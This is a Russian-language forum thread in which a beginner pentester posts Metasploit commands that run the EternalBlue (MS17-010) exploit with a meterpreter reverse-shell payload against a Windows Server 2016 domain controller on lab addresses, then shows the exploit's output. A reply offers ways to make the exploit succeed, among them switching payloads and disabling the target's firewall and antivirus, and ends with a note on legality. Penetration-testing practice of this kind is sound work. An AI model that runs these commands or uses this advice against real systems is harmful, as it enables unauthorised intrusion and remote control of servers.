Здравствуйте! Я начинающий пентестер и хотел бы задать вопрос. У меня есть Windows Server 2016 Standard (версия 14393), который является доменным контроллером с именем kuku.wsr. Используя EternalBlue, я обнаружил, что сервер уязвим. Я попытался подключиться к серверу через Metasploit с помощью следующих команд: ``` use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp (или bind_tcp, оба варианта не работают) set LHOST 192.168.115.132 set RHOST 192.168.115.128 exploit ``` Однако при выполнении команды `exploit` я получаю следующую ошибку: ``` [*] 192.168.115.128:445 - Connecting to target for exploitation. [+] 192.168.115.128:445 - Connection established for exploitation. [+] 192.168.115.128:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.115.128:445 - CORE raw buffer dump (45 bytes) [*] 192.168.115.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.115.128:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva [*] 192.168.115.128:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393 [+] 192.168.115.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.115.128:445 - Trying exploit with 22 Groom Allocations. [*] 192.168.115.128:445 - Sending all but last fragment of exploit packet [*] 192.168.115.128:445 - Starting non-paged pool grooming [+] 192.168.115.128:445 - Sending SMBv2 buffers [+] 192.168.115.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.115.128:445 - Sending final SMBv2 buffers. [*] 192.168.115.12 ``` Не могли бы вы помочь разобраться в причине возникновения этой проблемы?
Проблемы с использованием эксплойта EternalBlue в Metasploit могут возникать по разным причинам. Давайте рассмотрим несколько возможных причин и решений: 1. **Настройки брандмауэра**: Убедитесь, что на целевом сервере (192.168.115.128) не работает брандмауэр (или хотя бы порт 445 открыт). Вы можете временно отключить брандмауэр и повторить попытку. 2. **Антивирусное ПО**: Если на целевом сервере установлено антивирусное ПО, оно может блокировать попытки эксплуатации. Убедитесь, что антивирусное ПО отключено. 3. **Настройки Metasploit**: - Убедитесь, что вы используете последнюю версию Metasploit и что все модули обновлены. Команда `msfupdate` позволит вам получить обновления. - Попробуйте изменить тип полезной нагрузки (*payload*). Например, используйте `windows/x64/meterpreter/reverse_http`, если у вас проблемы с TCP. 4. **Проблемы с сетевым соединением**: Проверьте, можете ли вы получить доступ к целевому серверу по протоколу SMB. Вы можете использовать команду `smbclient` для проверки: ``` smbclient -L //192.168.115.128 -U username ``` 5. **Проверка уязвимости**: Убедитесь, что сервер действительно уязвим к эксплойту MS17-010. Вы можете проверить это с помощью `nmap`: ``` nmap -p 445 --script smb-vuln-ms17-010 192.168.115.128 ``` 6. **Корректные IP-адреса**: Убедитесь, что вы правильно указали адреса в `LHOST` и `RHOST`. `LHOST` должен быть вашим IP-адресом в той же подсети, что и целевой сервер. Если вы попробовали все эти шаги, но все еще получаете ошибки, более детальная информация об ошибке может помочь в диагностике. Напоминаю, что использование подобного программного обеспечения должно проводиться только в рамках законных действий и только с разрешения владельца системы.
лет 30 назад предлагали стать раком и со всей дури в стену разогнаться, в ВДВ это называлось - бегущий лось
Если нужна ещё доп информация, напишите пожалуйста
я недопентестерkali linuxну вот сразу всё и ясно, вопрос к удалению